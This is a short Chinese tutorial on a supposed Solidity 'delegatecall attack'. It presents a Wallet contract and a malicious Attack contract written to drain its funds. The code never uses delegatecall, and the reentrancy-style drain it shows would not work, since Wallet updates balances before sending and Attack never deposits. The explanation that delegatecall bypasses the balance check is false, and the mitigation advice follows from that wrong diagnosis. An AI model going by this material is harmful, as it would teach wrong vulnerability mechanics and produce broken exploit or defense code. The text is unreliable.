# 委托调用攻击

Solidity中的委托调用（`delegatecall`）功能允许合约在当前上下文中执行其他合约的函数。这种机制可以用来实现模块化代码和库，但也有可能被黑客利用进行攻击。

在本示例中，我们将创建一个名为 `Attack` 的恶意合约，它会尝试利用委托调用漏洞攻击名为 `Wallet` 的另一个合约，并窃取该合约中的资金。

```solidity
pragma solidity ^0.5.16;

contract Wallet {
    mapping(address => uint256) private balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 _amount) public {
        require(balances[msg.sender] >= _amount);
        balances[msg.sender] -= _amount;
        (bool success, ) = msg.sender.call.value(_amount)("");
        require(success);
    }
}

contract Attack {
    Wallet wallet;

    constructor(Wallet _wallet) public {
        wallet = Wallet(_wallet);
    }

    function attack() public payable {
        wallet.withdraw(msg.sender.balance);
    }

    function () external payable {
        if (address(wallet).balance > 0) {
            wallet.withdraw(1 ether);
        }
    }
}
```

在此示例中，我们定义了两个合约： `Wallet` 和 `Attack`。

`Wallet` 合约是一个基本的钱包合约，允许用户存款、提款和查询余额。合约使用映射来跟踪每个地址的余额，并在执行提款操作时使用委托调用来发送资金。

`Attack` 合约是一个恶意合约，它接受一个 `Wallet` 合约作为参数，并尝试利用委托调用漏洞攻击该合约。在 `attack` 函数中，我们将 `msg.sender` 中的所有金额全部提取到 `Attack` 合约中。在 `fallback` 函数中，我们检查 `Wallet` 合约是否仍有余额，如果有，则尝试从中提取1ETH。

当黑客调用 `Attack` 合约的 `attack` 函数时，它会将其帐户中的所有资金提取出来，并在 `Wallet` 合约上调用 `withdraw` 函数。由于委托调用机制允许 `withdraw` 函数在当前上下文中执行，因此攻击者可以绕过 `require(balances[msg.sender] >= _amount)` 条件并窃取整个合同中的资金。

为了避免这种攻击，我们需要避免使用委托调用机制或者对它进行更加严格的身份验证和授权检查。如果您正在使用第三方库，请确保完全理解其工作原理并信任其代码。